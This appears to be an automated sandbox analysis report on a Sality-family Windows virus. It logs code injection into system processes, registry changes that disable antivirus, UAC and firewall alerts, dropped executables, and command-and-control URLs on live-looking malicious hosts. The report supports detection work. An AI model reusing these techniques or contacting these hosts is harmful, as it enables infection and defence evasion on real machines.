            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: D10000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 360000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\conhost.exe base: 650000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: E80000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: B50000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dllhost.exe base: 780000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: A90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: AB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: BB0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\dwm.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\sihost.exe base: 490000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: F0000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: A60000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\ctfmon.exe base: B90000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\explorer.exe base: 8B30000Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMemory written: C:\Windows\System32\svchost.exe base: CB0000Jump to behavior
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeMemory written: C:\Windows\System32\sihost.exe base: EC0000Jump to behavior
            Source: dwm.exe, 00000005.00000000.1391611008.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.2910871589.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: explorer.exe, 0000000A.00000000.1437867129.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2634147825.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
            Source: dwm.exe, 00000005.00000002.2941739746.00000262EB6C0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000005.00000000.1391903528.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000006.00000000.1422577845.0000020077A51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformationJump to behavior
            Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128E329 MultiByteToWideChar,RtlEnterCriticalSection,GetLocalTime,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,GetFileTime,CreateFileMappingA,MapViewOfFile,lstrcpyn,lstrcmpiA,GlobalAlloc,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,GetTickCount,GlobalAlloc,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,WriteFile,GlobalFree,SetFileTime,CloseHandle,SetFileAttributesA,DeleteFileA,GlobalFree,RtlLeaveCriticalSection,Sleep,0_2_0128E329
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01293B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,0_2_01293B60
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | Registry value created: DisableNotifications 1

Remote Access Functionality

Source: Yara match | File source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_012883C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread, 0_2_012883C9
Source: C:\Users\user\Desktop\PfBjDhHzvV.exe | Code function: 0_2_01287A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread, 0_2_01287A3A
[MITRE ATT&CK matrix; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact; the technique grid and its per-technique signature counts were flattened during extraction and are not recoverable]
Behavior Graph ID: 1536844 | Sample: PfBjDhHzvV.exe | Startdate: 18/10/2024 | Architecture: WINDOWS | Score: 100
• Start node: padrup.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
• PfBjDhHzvV.exe (started; 501 registry values created, 27 files created)
  • Network: 189.25.42.209 (ports 1338, 49725, 49765; TelemarNorteLesteSABR, Brazil); padrup.com 185.53.178.50 (ports 49731, 49758, 49783; TEAMINTERNET-ASDE, Germany); 49 other IPs or domains
  • Dropped: C:\taqcpb.exe (PE32); C:\Users\user\AppData\Local\Temp\xlroe.exe (PE32); C:\Users\user\AppData\Local\Temp\xjjalq.exe (PE32); 2 other malicious files
  • Signatures: Query firmware table information (likely to detect VMs); Creates autorun.inf (USB autostart); Tries to detect sandboxes and other dynamic analysis tools (window names); 15 other signatures
  • Injected into: faawXJQQDELvfTymNiVz.exe (501 registry values created, 13 files created); SearchApp.exe; faawXJQQDELvfTymNiVz.exe; 34 other processes
• faawXJQQDELvfTymNiVz.exe (injected)
  • Dropped: C:\Users\user\AppData\Local\...\winysum.exe (PE32); C:\Users\user\AppData\Local\...\winbwxmuq.exe (PE32)
  • Signatures: Injects code into the Windows Explorer (explorer.exe); Disables user account control notifications; Writes to foreign memory regions; Allocates memory in foreign processes
• SearchApp.exe (injected): Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
• faawXJQQDELvfTymNiVz.exe (injected, second instance): Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
PfBjDhHzvV.exe | 95% | ReversingLabs | Win32.Virus.Sality |
PfBjDhHzvV.exe | 100% | Avira | W32/Sality.AT |
PfBjDhHzvV.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\winbwxmuq.exe | 100% | Avira | W32/Sality.AT |
C:\Users\user\AppData\Local\Temp\winysum.exe | 100% | Avira | W32/Sality.AT |
C:\Users\user\AppData\Local\Temp\xjjalq.exe | 100% | Avira | W32/Sality.AT |
C:\Users\user\AppData\Local\Temp\xlroe.exe | 100% | Avira | W32/Sality.AT |
C:\taqcpb.exe | 100% | Avira | W32/Sality.AT |
C:\Users\user\AppData\Local\Temp\winbwxmuq.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\winysum.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\xjjalq.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\xlroe.exe | 100% | Joe Sandbox ML | |
C:\taqcpb.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://graph.windows.net/ | 0% | URL Reputation | safe |
https://reactjs.org/docs/error-decoder.html?invariant= | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
padrup.com | 185.53.178.50 | true | true | | unknown
              NameMaliciousAntivirus DetectionReputation
              http://190.120.227.91:8080/sobakavolos.gif?70c2488=591181480true
                unknown
                http://padrup.com/sobaka1.gif?8dc219=65031855true
                  unknown
                  http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062true
                    unknown
                    http://padrup.com/sobaka1.gif?a66df5=87257000true
                      unknown
                      http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090true
                        unknown
                        http://190.120.227.91:8080/sobakavolos.gif?36c07fa=459292624true
                          unknown
                          http://190.120.227.91:8080/sobakavolos.gif?2c177da=138700686true
                            unknown
                            http://190.120.227.91:8080/sobakavolos.gif?3fa5859=600644385true
                              unknown
                              http://padrup.com/sobaka1.gif?7a93601=771179526true
                                unknown
                                http://190.120.227.91:8080/sobakavolos.gif?212b208=34779656true
                                  unknown
                                  http://190.120.227.91:8080/sobakavolos.gif?588b379=464224605true
                                    unknown
                                    http://190.120.227.91:8080/sobakavolos.gif?15f8580=23037312true
                                      unknown
                                      http://padrup.com/sobaka1.gif?29e644c=439347960true
                                        unknown
                                        http://190.120.227.91:8080/sobakavolos.gif?90f197=37996124true
                                          unknown
                                          http://190.120.227.91:8080/sobakavolos.gif?c5c499=38882763true
                                            unknown
                                            http://190.120.227.91:8080/sobakavolos.gif?167a9d17=1508537436true
                                              unknown
                                              http://padrup.com/sobaka1.gif?3f9f77c=600421212true
                                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com:443/v1/news/Feed/Windows?t | explorer.exe, 0000000A.00000002.2800092520.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1446640101.0000000007276000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/spartan/ntpI | SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://osoft.co_2010-06X | dwm.exe, 00000005.00000000.1392615637.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000005.00000002.3004388837.00000262ED790000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs | SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://aefd.nelreports.net/api/report?cat=bingaotak | SearchApp.exe, 0000000F.00000000.1560312039.000001F49B244000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://padrup.com/sobaka1.gif?617d87e=1022260460) | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5 | SearchApp.exe, 0000000F.00000000.1623611969.000001F4AEDC6000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?1c6e18df=476977375-& | PfBjDhHzvV.exe, 00000000.00000002.2249198496.0000000005B7B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?653dba7=849272120( | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.Purchasep | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://wns.windows.com/ | explorer.exe, 0000000A.00000000.1450832815.00000000090F2000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.Component.WebApi.ClientConditionsProcessor | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?4d57b0b=162199062; | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000A.00000003.2275648262.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1455294750.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2275779862.000000000C44D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2283066349.000000000C450000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w | SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://padrup.com/sobaka1.gif?7a93601=771179526b | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://kukutrustnet987.info/home.gif | PfBjDhHzvV.exe, 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp, faawXJQQDELvfTymNiVz.exe, 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmp | false | | unknown
http://ns.adobe.hoL2 | StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRight | SearchApp.exe, 0000000F.00000000.1608010494.000001F4AEA67000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ns.adora | StartMenuExperienceHost.exe, 0000000D.00000000.1498293624.000001A43FFC2000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://ntp.msn.com/web-widget?form=M | SearchApp.exe, 0000000F.00000000.1578437841.000001F49D9E3000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://padrup.com/sobaka1.gif?7a93601=771179526q | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?2bf5c9b=276573090~ | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://accounts.xboxlive.com/codeOfConduct/ | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://loki.delve.office.com/api33366b5b-54ef-48bf-819d-677748eae9e33B199897-A63E-44DC-BF20-DF6F6F2 | SearchApp.exe, 0000000F.00000000.1561497256.000001F49B460000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://padrup.com/sobaka1.gif?f24e375=-2008285411y | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xsts.auth.xboxlive.comey | SearchApp.exe, 0000000F.00000000.1562812972.000001F49B644000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://190.120.227.91:8080/sobakavolos.gif?10aef23e=19593051388 | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FC4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://padrup.com/sobaka1.gif?52dc95=21721684~ | PfBjDhHzvV.exe, 00000000.00000002.2237917858.0000000000FAC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Windows.Web.Http | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 0000000A.00000000.1450832815.0000000008F83000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://login.windows.localicy | svchost.exe, 00000007.00000000.1425679854.0000018CE728E000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | SearchApp.exe, 0000000F.00000000.1548632266.000001EC9A58B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1566432203.000001F49BCBA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1544714307.000001EC94D13000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://substrate.office.com/SubstrateSearch-Internal.ReadWrite_iframe.contentWindow.BingAtWork.work | SearchApp.exe, 0000000F.00000000.1562380324.000001F49B5D0000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://substrate.office.com/search/api/v2/queryhttps://substrate.office365.us/search/api/v2/query | SearchApp.exe, 0000000F.00000000.1562196902.000001F49B590000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchase.DataModel.PaymentInstruments | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://xsts.auth.xboxlive.com/ | svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://windows.msn.com/shell | SearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.datacontract.org/2004/07/Store.Purchasep | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9553000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.office.com/Z | SearchApp.exe, 0000000F.00000000.1599317840.000001F4AE700000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://live.xbox.com/purchase/xbox/ | WinStore.App.exe, 00000016.00000000.1749207020.00000147A9720000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000016.00000000.1749207020.00000147A9718000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://excel.office.comp | StartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://xsts.auth.xboxlive.com | svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://powerpoint.office.comcemberx | StartMenuExperienceHost.exe, 0000000D.00000000.1499131744.000001A4423E6000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://outlook.office.com/User.ReadWritej | SearchApp.exe, 0000000F.00000000.1599565472.000001F4AE720000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
https://login.windows.localhttps://login.windows.local/ | WinStore.App.exe, 00000016.00000000.1751253222.00000147C8E02000.00000004.00000001.00020000.00000000.sdmp | false | | unknown
http://schemas.micro | explorer.exe, 0000000A.00000002.2928181034.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1448330097.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1449558403.0000000008820000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000E.00000000.1529627936.00000269817E0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1706581163.0000018570620000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
